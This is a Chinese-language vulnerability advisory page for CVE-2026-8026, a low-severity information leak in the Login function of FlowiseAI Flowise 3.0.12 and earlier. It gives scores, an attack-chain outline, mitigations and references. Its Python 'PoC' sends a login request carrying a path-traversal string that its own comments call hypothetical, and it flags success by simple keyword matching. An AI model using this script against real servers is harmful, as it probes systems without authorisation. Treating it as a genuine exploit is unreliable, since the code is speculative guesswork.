CVE-2026-8026 CVSS 3.7 低危

CVE-2026-8026 FlowiseAI信息泄露漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8026

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FlowiseAI Flowise

漏洞概述

FlowiseAI Flowise 3.0.12及之前版本存在安全漏洞。该漏洞位于组件API Response Handler的文件`packages/server/src/enterprise/services/account.service.ts`中的Login函数。攻击者可以通过网络远程发起攻击，利用该漏洞导致信息泄露。攻击复杂度高，利用难度较大。建议用户尽快升级受影响的组件以修复此漏洞。

技术细节

该漏洞源于FlowiseAI Flowise在处理登录请求时的API响应处理逻辑不当。具体受影响的文件是`packages/server/src/enterprise/services/account.service.ts`，其中的Login函数未能正确过滤或封装敏感信息。当攻击者向受影响端点发送特制请求时，由于缺乏有效的认证检查（PR:N）和边界条件处理，系统可能在响应中返回本不应公开的敏感数据（如用户信息、内部路径或会话令牌等）。由于CVSS向量显示攻击复杂度为高（AC:H），意味着利用此漏洞需要特定的条件或对系统内部逻辑有较深的理解，且无需用户交互即可远程触发。虽然目前机密性影响被评估为低（C:L），但任何信息泄露都可能为进一步的攻击提供辅助。

攻击链分析

STEP 1

1. 侦察阶段

攻击者扫描网络，识别出使用FlowiseAI Flowise 3.0.12及以下版本的目标服务器。

STEP 2

2. 漏洞利用

攻击者向目标服务器的Login接口（/api/v1/login）发送精心构造的恶意数据包，利用account.service.ts中的逻辑缺陷。

STEP 3

3. 信息获取

服务器由于API Response Handler处理不当，在响应报文中返回了敏感信息，攻击者截获并解析这些信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-8026: Information Disclosure in FlowiseAI
# Target: FlowiseAI <= 3.0.12
# Description: Sending a crafted request to the login endpoint may trigger information disclosure.

target_url = "http://target-ip:3000/api/v1/login"

# Example payload structure to trigger the flaw in account.service.ts
# The specific parameters depend on the exact implementation of the Login function.
payload = {
    "username": "test",
    "password": "test",
    "manipulation_param": "../../../sensitive/data" # Hypothetical path traversal or malformed input
}

try:
    response = requests.post(target_url, json=payload, timeout=10)
    if response.status_code == 200:
        # Check if sensitive data is leaked in the response body
        if "sensitive" in response.text or "error" in response.text:
            print("[+] Potential Information Disclosure Detected!")
            print("Response Headers:", response.headers)
            print("Response Body:", response.text)
        else:
            print("[-] No obvious leakage detected in this attempt.")
    else:
        print(f"Server returned status code: {response.status_code}")
except Exception as e:
    print(f"Error connecting to target: {e}")

影响范围

FlowiseAI Flowise <= 3.0.12

防御指南

临时缓解措施

如果无法立即升级，建议在API网关层面限制对登录接口的访问频率，并检查日志中是否存在异常的响应数据，临时禁用详细的错误信息返回。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8026
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8026
3 Details https://www.cvedetails.com/cve/CVE-2026-8026/
4 VulDB https://vuldb.com/cve/CVE-2026-8026
5 Link https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91
6 Link https://vuldb.com/submit/777656
7 Link https://vuldb.com/vuln/361273
8 Link https://vuldb.com/vuln/361273/cti
9 Link https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表